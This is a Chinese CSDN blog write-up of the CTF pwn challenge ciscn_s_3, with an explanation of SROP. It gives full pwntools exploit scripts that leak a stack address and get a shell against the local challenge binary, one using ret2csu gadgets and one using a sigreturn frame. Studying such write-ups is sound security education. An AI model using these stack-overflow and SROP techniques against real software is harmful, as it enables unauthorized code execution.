ciscn_s_3--retsyscall与csu的结合及srop_sigreturn的简单使用

于 2024-06-10 13:09:05 发布
阅读量891 收藏 13
点赞数 26
文章标签: linux 运维 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhuo1358/article/details/139551401
版权

基础检查

放入ida

存在栈溢出,并且buf只有0x10,而write有0x30,因此可以泄露栈上的内容

3B=59是execv的调用号,这个指令可以调用内核execv

如果能够知道/bin/sh的地址,就可以获得shell

因为栈上没有/bin/sh,可以考虑read读入,结合前面有漏洞可以泄露栈上的位置,

考虑用write泄露某一栈上地址,在计算此地址到输入点的偏移,

这样当我们输入/bin/sh时就可以得到这个地址

这个地址存的是程序名

如图也在泄露范围内

那么就可以泄露这个地址

可以算出此地址到输入点的偏移为0x118

所以第一个payload的构造为

payload=b'/bin/sh\x00'+b'a'*8+p64(vuln)
io.sendline(payload)
io.recv(0x20)
binsh=u64(io.recv(8))-0x118
print(hex(binsh))

 payload2的构造

方法一

pay=b'/bin/sh\x00'*2
pay+=p64(pop_csu)
pay+=p64(0)*2
pay+=p64(binsh+0x50)
pay+=p64(0)*3
pay+=p64(mov_call)
pay+=p64(mov_rax)
pay+=p64(rdi)
pay+=p64(binsh)
pay+=p64(syscall)
io.sendline(pay)

解释

在execve的系统调用中

参数布局为

rdi=/bin/sh

rsi=0

rdx=0

因为找不到可用的rsi和rdx

我们考虑用csu间接将参数传给rsi 和rdx

这个payload的构造非常巧妙 将rbx和rbp设为0,r12设为(binsh+0x50)都有特别用意

(1)根据我们前面payload的构造

可以知道binsh+0x50就是将execve调用号放入rax的指令,方便进行syscall

(2)首先将rbx和rbp 设为0

使得通不过 cmp rbx,rbp

从而通过jnz指令跳回0x400580

这时候rbx已被加1,所以这次call的地址就变为(binsh+0x50+8)即pop_rdi的位置让我们能够继续控制程序

因为rsi 和rdx已经设置完了,那接下来只要将binsh传入rdi并执行syscall即可获得shell

最终exp

from pwn import *

io=process('./ciscn_s_3')
context.log_level='debug'
context(arch='amd64', os='linux')
elf=ELF('./ciscn_s_3')

pop_csu=0x40059A
mov_call=0x400580
rdi=0x4005A3
vuln=0x4004ED
mov_rax=0x4004E2
syscall=0x400501
payload=b'/bin/sh\x00'+b'a'*8+p64(vuln)
io.sendline(payload)
io.recv(0x20)
binsh=u64(io.recv(8))-0x118
print(hex(binsh))
pay=b'/bin/sh\x00'*2+p64(pop_csu)+p64(0)*2+p64(binsh+0x50)+p64(0)*3+p64(mov_call)+p64(mov_rax)+p64(rdi)+p64(binsh)+p64(syscall)
io.sendline(pay)
"""frame=SigreturnFrame()
frame.rax=constants.SYS_execve
frame.rdi=binsh
frame.rsi=0x0
frame.rdx=0x0
frame.rip=syscall
payload=b'/bin/sh\x00'.ljust(0x10,b'a')+p64(0x4004da)+p64(syscall)+bytes(frame)"""

io.interactive()

方法二 srop利用

原理:

这里基础知识就搬运ctfwiki上的了,讲解的我觉得很全面了,我也会进行添加补充讲解,便于理解。

signal 机制是类 unix 系统中进程之间相互传递信息的一种方法。一般,我们也称其为软中断信号,或者软中断。比如说,进程之间可以通过系统调用 kill 来发送软中断信号。一般来说,信号机制常见的步骤如下图所示:

  1. 内核向某个进程发送 signal 机制,该进程会被暂时挂起,进入内核态。
  2. 内核会为该进程保存相应的上下文,主要是将所有寄存器压入栈中,以及压入 signal 信息,以及指向 sigreturn 的系统调用地址。此时栈的结构如下图所示,我们称 ucontext 以及 siginfo 这一段为 Signal Frame。需要注意的是,这一部分是在用户进程的地址空间的。之后会跳转到注册过的 signal handler 中处理相应的 signal。因此,当 signal handler 执行完之后,就会执行 sigreturn 代码。

①保存上下文环境(即各种寄存器),接下来走到②执行信号处理函数,处理完后③恢复相关栈环境,④继续执行用户程序。而在恢复寄存器环境时没有去校验这个栈是不是合法的,如果我们能够控制栈,就能在恢复上下文环境这个环节直接设定相关寄存器的值。

在执行sigreturn 之后的restore context阶段,整个frame是在用户态,同时会执行大量的pop指令,这时我们就可以直接设定寄存器的值来伪造一个虚假的frame从而getshell

使用SROP的前提

  • 首先程序必须存在溢出,能够控制返回地址。

  • 可以去系统调用sigreturn(如果找不到合适的系统调用号,可以看看能不能利用read函数来控制RAX的值)

  • 必须能够知道/bin/sh的地址,如果写的bss段,直接写地址就行,如果写到栈里,还需要想办法去泄露栈地址。

  • 允许溢出的长度足够长,这样可以去布局我们想要的寄存器的值

  • 需要知道syscall指令的地址

    frame=SigreturnFrame()
frame.rax=constants.SYS_execve
frame.rdi=binsh
frame.rsi=0x0
frame.rdx=0x0
frame.rip=syscall
payload=b'/bin/sh\x00'.ljust(0x10,b'a')+p64(0x4004da)+p64(syscall)+bytes(frame)

    注意这里的syscall必须是syscall_ret,来控制程序

最终exp

from pwn import *

io=process('./ciscn_s_3')
context.log_level='debug'
context(arch='amd64', os='linux')
elf=ELF('./ciscn_s_3')

pop_csu=0x40059A
mov_call=0x400580
rdi=0x4005A3
vuln=0x4004ED
mov_rax=0x4004E2
syscall=0x400517
payload=b'/bin/sh\x00'+b'a'*8+p64(vuln)
io.sendline(payload)
io.recv(0x20)
binsh=u64(io.recv(8))-0x118
print(hex(binsh))
'''pay=b'/bin/sh\x00'*2+p64(pop_csu)+p64(0)*2+p64(binsh+0x50)+p64(0)*3+p64(mov_call)+p64(mov_rax)+p64(rdi)+p64(binsh)+p64(syscall)'''
io.sendline(pay)
frame=SigreturnFrame()
frame.rax=constants.SYS_execve
frame.rdi=binsh
frame.rsi=0x0
frame.rdx=0x0
frame.rip=syscall
payload=b'/bin/sh\x00'.ljust(0x10,b'a')+p64(0x4004da)+p64(syscall)+bytes(frame)
io.sendline(payload)

io.interactive()

 拿到shell

呀卡吗洗.
关注
  • 26
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【CTF】【PWN】ciscn_s_3题解
m0_50819561的博客
09-23 758
前置知识: 64位系统: 传参方式:首先将系统调用号 传入 rax,然后将参数从左到右依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 调用号:sys_read 的调用号为0,sys_write 的调用号 为1 stub_execve 的调用号为59,stub_rt_sigreturn 的调用号为15 调用方式: 使用 syscall 进行系统调用 首先惯例checksec一下。发现NX保护开了。 用IDA打开文件之后返现main函数里面套了一个vuln函数。跟进去查看如下 tab转汇编
buuctf:ciscn_s_3题解
xia0ji233
05-27 692
title: 系统调用的学习 date: 2021-05-25 22:00:00 tags: binary security study report syscall comments: true categories: ctf pwn today新的知识又增长了,发现了getshell的另一种方式:syscall和srop。故事还要源于…(此处省略万字输出) (note:本作者这次有点懒,没有写AT&T汇编,而是一律用了intel汇编,请悉知) 可能是之前汇编基础不太好吧,竟没有发现sy.
SROP学习 smallest & ciscn_s_3
红叶的博客
03-19 493
SROP学习,例题 smallest ,ciscn_s_3
我又pwn了 ——刷题篇 ciscn_s_3
m0_64195960的博客
08-08 479
ret2csu&SROP
2019ciscn_s_3
Hyrink的博客
06-07 487
ciscn_s_3的两种解法:SROP & ret2csu详解
FORTOCSU_IDE__CSU-IDE软件使用教程_芯海_
10-02
**FORTOCSU_IDE__CSU-IDE软件使用教程_芯海_** 这篇教程将详细介绍芯海科技推出的集成开发环境(Integrated Development Environment,简称IDE)——CSU-IDE的使用方法。作为一款专为芯海芯片设计的开发工具,CSU-...
Matlab代码verilog-ACA-CSU_Approximate-Adders:ACA-CSU近似加法器的MATLAB和HDL模型
05-27
ACA-CSU近似加法器 这是ACA-CSU近似加法器的MATLAB和HDL模型的GitHub存储库。 性能矩阵 加法器 错误率(%) 内德 MRED 延迟(ns) 面积(μm2的) 功率(μW) 7.9021 0.0552865 0.017437931 0.38 61.977999 39.086...
cslds-software-csu:中南大学软件学院学生学习发展与服务中心
02-03
cslds-软件-csu中南大学软件学院学业服务与发展中心代码仓库运行环境Node.js> = 7.6.0或使用--harmony部署说明初始化在Terminal中执行npm run setup ,按提示完成npm run setup 。 $ npm install$ npm run setup...
csu.rar_pci 采集 linux_pci 驱动_数据采集_采集卡
09-20
在计算机硬件领域,PCI(Peripheral Component Interconnect)接口是一种广泛使用的总线标准,用于连接计算机系统中的外部设备,如数据采集卡。本资料主要涉及的是Linux操作系统下的PCI驱动程序开发,特别是针对一种...
中南大学本科生毕业设计论文模板-CSU_Thesis_Template.zip
最新发布
11-07
该压缩包文件"CSU_Thesis_Template.zip"包含了主要的文件和指南,让学生能够快速理解和应用论文撰写的基本结构和要求。 在解压后的主要文件"CSU_Thesis_Template-main"中,我们可以找到以下几个关键组成部分: 1. ...
SROP简单姿势学习-Ciscn_s_3
aptx4869_li的博客
08-06 513
解题思路 安全机制检查 healer@healer-virtual-machine:~/Desktop/ciscn_s_3$ readelf -h ciscn_s_3 ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, lit
ciscn_2019_s_3(系统调用综合)
weixin_61283545的博客
06-11 730
打开函数只有read和write。发现gadget函数,这道题重要关键在于系统调用号。发现gadget rax赋值为59,调用execve,ida H键变10进制,调用execve需要$rax==59$rdi==“/bin/sh”$rsi==0$rdx==0syscall这时候就需要用到libc_csu辅助,ropper里面可以找到pop rdi,/bin/sh\x00我们可以直接通过read写入栈中,其他的利用gadget进行填充。 注意的是read后面没有leave不用填充。还有一点在执行csu_e
ciscn_2019_s_3(SROP)
m0_62322730的博客
04-18 267
PWN学习:ciscn_s_3,SROP。萌新的第一篇博客,有任何错误请指正~
【pwn】 ciscn_2019_final_3
Nothing
12-18 1697
例行检查 保护全开,分析程序。 add函数 只能申请小于0x78大小的chunk,chunk数量不能超过24个,且题目给了申请到内存空间的地址。 free函数 free后指针没有置0,且libc是2.27的,存在tcache dup。唯一问题就在于如何得到libc的地址。泄露libc地址一般通过unsortbin,存在tcache的情况下,64位程序需要申请超过0x400大小chunk,fre...
ciscn_2019_s_3的wp
wuyvle的博客
02-15 256
这是一道新颖的题 64位程序看看vuln函数的汇编 看来利用了系统调用 首先我们来看看什么是系统调用 32位与64位 系统调用的区别: 1. 传参方式不同 2. 系统调用号 不同 3. 调用方式 不同 32位: 传参方式:首先将系统调用号 传入 eax,然后将参数 从左到右 依次存入 ebx,ecx,edx寄存器中,返回值存在eax寄存器 调用号:sys_read 的调用号 为 3 sys_write 的调用号 为 4 调用方式: 使用 int 80h 中断进行系统调用 64位: 传参方式:首先将系统
【pwn】ciscn_2019_s_3
Nothing
12-14 4540
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
[BUUCTF]PWN21——ciscn_2019_s_3
mcmuyanga的博客
09-07 1520
[BUUCTF]PWN21——ciscn_2019_s_3 附件 步骤 例行检查,64位,开启了NX保护 试运行的时候回显是一些乱码,直接用ida打开,从main函数开始看 main函数调用了vuln函数 __asm 关键字用于调用内联汇编程序,并且可在 C 或 C++ 语句合法时出现。 我们首先要了解一下64位系统的系统调用 传参方式:首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 调用号:sys_read 的调用号 为 0 ;
ciscn_2019_s_3
qq_45691294的博客
12-29 2163
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
FH-1200I NodeB的CSU RS485通信设计
本文档详细介绍了北京北方烽火科技有限公司针对FH-1200I NodeB设备中CSU (Control Switching Unit) BSP (Board Support Package)与Driver的设计,特别是关于在SCC2 (Serial Communication Controller)中使用RS485...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值